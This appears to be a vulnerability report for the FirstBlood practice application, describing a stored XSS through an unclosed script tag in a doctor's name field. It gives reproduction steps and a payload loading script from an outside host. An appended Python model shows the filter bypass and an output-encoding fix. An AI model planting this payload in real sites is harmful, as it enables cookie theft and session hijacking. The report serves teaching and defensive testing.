FirstBlood-#1268 Stored XSS at meet_drs.php
This issue was discovered on FirstBlood v3



On 2022-12-09, ayush1098 (Level 8) reported:

Hello Team,

Summary:

I have found a Stored XSS on the /meet_drs.php endpoint in the name parameter. There is a filter which works when we close the tag; if we don't close the tag, the payload will be executed on meet_drs.php.

Steps To Reproduce:

Log in with admin:admin credentials on login.php.

Go to the drpanel/edit-doctor.php?id=4 endpoint and put this payload in the name parameter.

<script src="https://brutelogic.com.br/2.js"

The payload will be executed on the meet_drs.php endpoint.

Impact:

Cookie stealing, session hijacking, etc.

Thanks & Regards

Ayush Singh

P2 High

Endpoint: /meet_drs.php

Parameter: name

Payload: "><script src="https://brutelogic.com.br/2.js"


FirstBlood ID: 54
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /meet_drs.php endpoint via a malicious doctor's name.
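Why an unclosed tag slips past a filter that only recognises closed tags, as an added Python model that is not FirstBlood's code: `naive_filter` and the `<td>` template are assumptions standing in for the real filter and page, `script_srcs` shows what a tolerant HTML tokenizer makes of each rendering, and the closed-tag variant is constructed for comparison.

```python
import html
import re
from html.parser import HTMLParser

# Payload quoted in the report: the <script> start tag is never closed.
UNCLOSED = '<script src="https://brutelogic.com.br/2.js"'
# Constructed closed variant, mirroring the report's note that the filter
# does catch a properly closed tag.
CLOSED = '<script src="https://brutelogic.com.br/2.js"></script>'


def naive_filter(name: str) -> str:
    """Hypothetical blocklist: strips only complete <tag ...>...</tag> pairs.
    Models the behaviour the report describes; not the project's real code."""
    return re.sub(r"<(\w+)[^>]*>.*?</\1\s*>", "", name, flags=re.I | re.S)


def render_naive(name: str) -> str:
    # Assumed listing template: the doctor name lands in an HTML text context.
    return f"<td>{naive_filter(name)}</td>"


def render_safe(name: str) -> str:
    # The fix: contextual output encoding instead of a blocklist. '<' can no
    # longer open a tag, whether or not the attacker closes it.
    return f"<td>{html.escape(name, quote=True)}</td>"


class ScriptSrcFinder(HTMLParser):
    """Collects src attributes of <script> start tags. Like a browser, the
    tokenizer ends the start tag at the NEXT '>', so the template's own
    '</td>' closes the attacker's unclosed tag for them."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)


def script_srcs(fragment: str) -> list[str]:
    """Detection check: external scripts a browser would load from fragment."""
    finder = ScriptSrcFinder()
    finder.feed(fragment)
    finder.close()
    return finder.srcs


if __name__ == "__main__":
    for render in (render_naive, render_safe):
        for payload in (UNCLOSED, CLOSED):
            print(render.__name__, repr(render(payload)), script_srcs(render(payload)))
```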